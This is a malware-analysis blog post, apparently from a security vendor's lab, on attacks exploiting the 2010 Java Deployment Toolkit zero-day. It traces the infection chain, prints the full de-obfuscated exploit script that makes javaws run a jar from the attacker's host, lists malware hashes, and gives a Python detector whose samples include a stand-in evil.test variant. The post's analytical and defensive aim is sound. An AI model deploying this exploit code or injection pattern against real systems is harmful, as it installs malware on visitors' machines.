
Who is Exploiting the Java Zero-Day?

Update: Oracle has released an emergency patch for this flaw. See the details at the bottom of this post.

————-

The recent discovery of a 0-day design flaw in the way the Java Deployment Toolkit hands arguments to Java Web Start (javaws) has opened new avenues for drive-by malware attacks.  This flaw was disclosed by Tavis Ormandy a few days ago, and it did not take long for the bad guys to turn the proof-of-concept code into real exploitation.  I have been reading about the exploit details for the last few days, but very few details were available on the active use of this exploit.  Who is using it, and what are they spreading?  This article is about exactly that, with emphasis on the post-infection activity.

Users who are interested in the inner workings of this 0-day flaw itself, can read the full disclosure here.

It all started like this: yesterday afternoon my colleague Stuart Staniford pointed me to a malicious domain, hxxp://zikkuat.com (dead at the moment), which he believed was exploiting this 0-day flaw.  A little analysis confirmed that it was.  Here are the details of my findings.

The whois record shows that zikkuat.com was registered around April 8th, 2010, a day before Tavis's public disclosure.

The sequence of events after I opened zikkuat.com from my lab was as follows:

1. hxxp://zikkuat.com  [main exploit page]

2. hxxp://zikkuat.com/50035/value3.php  [sub exploit page, loaded from the main page]

3. hxxp://zikkuat.com/50035/C0.php  [the .jar file, served under a .php name; it downloads the first-stage malware]

4. hxxp://zikkuat.com/50035/54098876  [the actual malware (Trojan.Piptea), a Windows PE binary]

5. Trojan.Piptea then dropped several further pieces of malware onto the infected machine. The malware details follow later in this post.


The main exploit page was highly obfuscated and looked like this:

[Screenshot: first-level (obfuscated) script of the main exploit page]

This script, after de-obfuscation, would look like this:

[Screenshot: de-obfuscated main script]

As we can see above, the main script goes on to load hxxp://zikkuat.com/50035/value3.php. After de-obfuscating the contents of value3.php, it looks like this (thanks to Julia Wolf for de-obfuscating it so quickly):

    // Argument handed to the Deployment Toolkit's launch() method. launch() is
    // meant to take a JNLP URL, but passes the string to javaws unchecked, so
    // the -J tokens are treated as JVM options: "-jar \\zikkuat.com\50035\C0.php"
    // makes the JVM run the attacker's jar, fetched over a UNC path.
    var u = "http: -J-jar -J\\\\zikkuat.com\\50035\\C0.php none";

    if (window.navigator.appName == "Microsoft Internet Explorer") {
        // IE: instantiate the Deployment Toolkit ActiveX control by its CLSID
        var o = document.createElement("OBJECT");
        o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
        o.launch(u);
    } else {
        // Firefox/Chrome: the same toolkit as an NPAPI plugin, tried under
        // both MIME types it registers
        var o = document.createElement("OBJECT");
        var n = document.createElement("OBJECT");
        o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
        n.type = "application/java-deployment-toolkit";
        document.body.appendChild(o);
        document.body.appendChild(n);
        try { o.launch(u); } catch (e) { n.launch(u); }
    }

As we can see, the plain-text value3.php script is almost identical to the proof-of-concept code Tavis published; the only meaningful change is the launch() argument, which now points at the attacker's jar instead of a harmless test jar.

Successful execution of this script on a vulnerable system makes javaws run "/50035/C0.php", which despite its name is a jar file (a self-contained Java executable), fetched from the attacker's host over the UNC path shown in the script. That jar then opens the gates for all kinds of badness.
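The pattern above, a launch() call whose argument carries -J tokens, is what a proxy, IDS or sandbox should be hunting for. The following Python is an added example of that check; it is not code from this post or from FireEye, and its three samples are constructed: the de-obfuscated value3.php quoted above, a benign deployJava-style launcher with a placeholder host, and an obfuscated variant pointing at the hypothetical host evil.test. It resolves the 'var u = "..."' indirection, undoes JavaScript, HTML and percent escapes, and reports the smuggled options and the jar path:

```python
"""Flag web content that smuggles JVM options through the Java Deployment Toolkit's launch()."""
import re
from html import unescape
from urllib.parse import unquote

# Values taken from the value3.php script quoted above: the toolkit's ActiveX
# CLSID (IE) and the two MIME types it registers as an NPAPI plugin.
DEPLOY_TOOLKIT_CLSID = "CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"
DEPLOY_TOOLKIT_MIME = ("application/npruntime-scriptable-plugin;deploymenttoolkit",
                       "application/java-deployment-toolkit")

# A JS string literal (double- or single-quoted, backslash escapes allowed).
_STR = r"""(?:"((?:\\.|[^"\\])*)"|'((?:\\.|[^'\\])*)')"""
_STRING_VAR = re.compile(r"\bvar\s+(\w+)\s*=\s*" + _STR)
_LAUNCH = re.compile(r"\.launch\s*\(\s*(?:" + _STR + r"|(\w+))\s*\)")
_JS_ESC = re.compile(r"\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)", re.S)


def js_unescape(s):
    """Decode the JS escapes that matter here (backslash pairs, quotes, \\n, \\xNN, \\uNNNN)."""
    def one(m):
        e = m.group(1)
        if len(e) > 1 and e[0] in "xu":
            return chr(int(e[1:], 16))
        return {"n": "\n", "r": "\r", "t": "\t"}.get(e, e)
    return _JS_ESC.sub(one, s)


def normalize(body):
    """Strip the cheap obfuscation layers: HTML entities and %XX escapes."""
    return unquote(unescape(body))


def launch_arguments(text):
    """Every string handed to a launch() call, resolving 'var u = "..."' indirection."""
    variables = {}
    for m in _STRING_VAR.finditer(text):
        name, dq, sq = m.groups()
        variables[name] = js_unescape(dq if dq is not None else sq)
    args = []
    for m in _LAUNCH.finditer(text):
        dq, sq, ident = m.groups()
        if ident is not None:
            value = variables.get(ident)
        else:
            value = js_unescape(dq if dq is not None else sq)
        if value is not None and value not in args:
            args.append(value)
    return args


def analyze(body):
    """Classify one HTTP response body. launch() should get a single JNLP URL; any
    whitespace-separated -J token is an option smuggled to the JVM, and the
    in-the-wild form "-J-jar -J<path>" makes the JVM run <path> as a jar."""
    text = normalize(body)
    toolkit = (DEPLOY_TOOLKIT_CLSID.lower() in text.lower()
               or any(m in text for m in DEPLOY_TOOLKIT_MIME))
    args = launch_arguments(text)
    injected, jar = [], None
    for arg in args:
        opts = [t[2:] for t in arg.split() if t.startswith("-J")]
        injected.extend(opts)
        if "-jar" in opts and opts.index("-jar") + 1 < len(opts):
            jar = opts[opts.index("-jar") + 1]
    return {"verdict": "exploit" if injected else "no-injection", "toolkit": toolkit,
            "launch_args": args, "injected": injected, "jar": jar}


# Constructed samples, not captured traffic. EXPLOIT is the de-obfuscated value3.php
# quoted above; BENIGN is an ordinary deployJava-style launcher on a placeholder host;
# OBFUSCATED uses a hypothetical host (evil.test) plus %XX and \xNN escapes.
EXPLOIT = r'''
var u = "http: -J-jar -J\\\\zikkuat.com\\50035\\C0.php none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
    var o = document.createElement("OBJECT");
    o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
    o.launch(u);
} else {
    var o = document.createElement("OBJECT"); var n = document.createElement("OBJECT");
    o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
    n.type = "application/java-deployment-toolkit";
    document.body.appendChild(o); document.body.appendChild(n);
    try { o.launch(u); } catch (e) { n.launch(u); }
}
'''
BENIGN = '<script>deployJava.launch("http://example.test/apps/viewer.jnlp");</script>'
OBFUSCATED = r'''
var q = document.createElement("OBJECT");
q.classid = "clsid:cafeefac-dec7-0000-0000-abcdeffedcba";
q.launch("\x68ttp: %2DJ-jar -J\\\\evil.test\\share\\a.jar none");
'''

if __name__ == "__main__":
    for name, sample in (("exploit", EXPLOIT), ("benign", BENIGN), ("obfuscated", OBFUSCATED)):
        print(name, analyze(sample))
```

The check is deliberately keyed on the -J injection rather than on the zikkuat.com host: the host will change long before the technique does. It is a network-side signal only; on the endpoint, keeping the toolkit control from being instantiated at all (see the workarounds mentioned below) is what actually stops the chain.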

The jar file after de-compilation looks like this:

[Screenshot: decompiled jar source]

It's clearly visible from the code that this jar file downloads and executes Trojan.Piptea from hxxp://zikkuat.com/50035/54098876.  Trojan.Piptea is a capable malware downloader and part of a very big pay-per-install network.  In a sample run inside my virtual machine, Piptea dropped seven more binaries on the infected system: six other malware families plus an updated copy of itself.  I am pretty sure the authors of those six families paid the Piptea guys good money to drop their creations across the Piptea zombie base.

The MD5s of these samples are:

0A557F250F96F31127AE3CB79B137D6E  -  Trojan.Piptea

a370bfa39a4ebcef8b5e3ffb4cfcd594  -  Trojan.Horst

e578a329bb6fcbafe8ec342eba3221e0  -  Trojan.Opachki

50c16385c80b65a5f41808a1e795638b  -  Trojan.Wimpixo

f11ad564e29714149314489baceed9da  -  Trojan.Bubnix

7cee3e1bf4e48dc0d70e93aa30f93e27  -  Trojan.Fakerean

27B2A4F2D3DDF2A3187C324163EB9950  -  Trojan.Piptea (update)

d9965ca03c53e4f5de232a81e415a537  -  Trojan.Ertfor

Readers who want to learn more about the motives behind dropping multiple pieces of malware on one infected system may read my earlier articles about BotnetWeb, written back in April 2009:

http://www.fireeye.com/research/2009/04/botnetweb.html

http://www.fireeye.com/research/2009/04/botnetweb-part-ii.html

Researchers from Trend Micro also came up recently (this April) with a similar concept, named BotnetMap.

It's pretty obvious that the simplicity and reliability of this exploit will make it a lethal weapon for the bad guys in the coming days.  Plus, the unavailability of any working patch is making the overall picture scarier.  I am pretty sure that in the coming days this exploit will become part of underground exploit kits.  This means that even a kiddie with basic computer skills and bad intentions can start making money out of this.  Today ESET mentioned in their blog that they have seen this flaw being used in a targeted attack as well.

Tavis's disclosure also mentions workarounds for IE and Firefox users (kill-bitting the Deployment Toolkit ActiveX control, whose CLSID appears in the script above, and disabling the toolkit plugin, respectively). I would urge users to use these workarounds until a working patch becomes available.

————-

Professional IT users may visit the following link for technical details:
http://www.oracle.com/technology/deploy/security/alerts/alert-cve-2010-0886.html

If you are looking for an easy way to update your home computer visit the following:
http://www.java.com/ and click on 'Free Java Download'

Atif Mushtaq @ FireEye Malware Intelligence Lab

Detailed Question/Comments : research SHIFT-2 fireeye DOT COM

3 thoughts on "Who is Exploiting the Java Zero-Day?"

  1. Nice work.
    The quoted script attempts to exploit Firefox and Chrome as well; this is done using the "o" and "n" objects.

  2. This vulnerability has been silently fixed in the most recent Java update (yesterday).

  3. FYI. Looks like your research posts are having a positive effect!!
    >> Oracle Security Alert CVE-2010-0886
    Description
    This Security Alert addresses security issues CVE-2010-0886 and CVE-2010-0887, which are vulnerabilities in desktop Java running in web browsers … These vulnerabilities may be remotely exploitable without authentication, i.e., they may be exploited over a network without the need for a username and password. For a successful exploit, a user running an affected release in their browser will need to visit a malicious web page that exploits this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user’s system.
    Supported Products Affected
    Java SE
    • JDK and JRE 6 for Windows, Solaris, and Linux
    Java for Business
    • JDK and JRE 6 for Windows, Solaris and Linux
    Patch Availability
    Customers who use default Java installation settings that include the automatic update of Java for security and other issues will have these fixes automatically applied over the next 30 days. Customers who do not have automatic update enabled or who want to immediately apply these important fixes, as is recommended by Oracle… (SEE URL FOR FULL DETAILS)
    http://www.oracle.com/technology/deploy/security/alerts/alert-cve-2010-0886.html
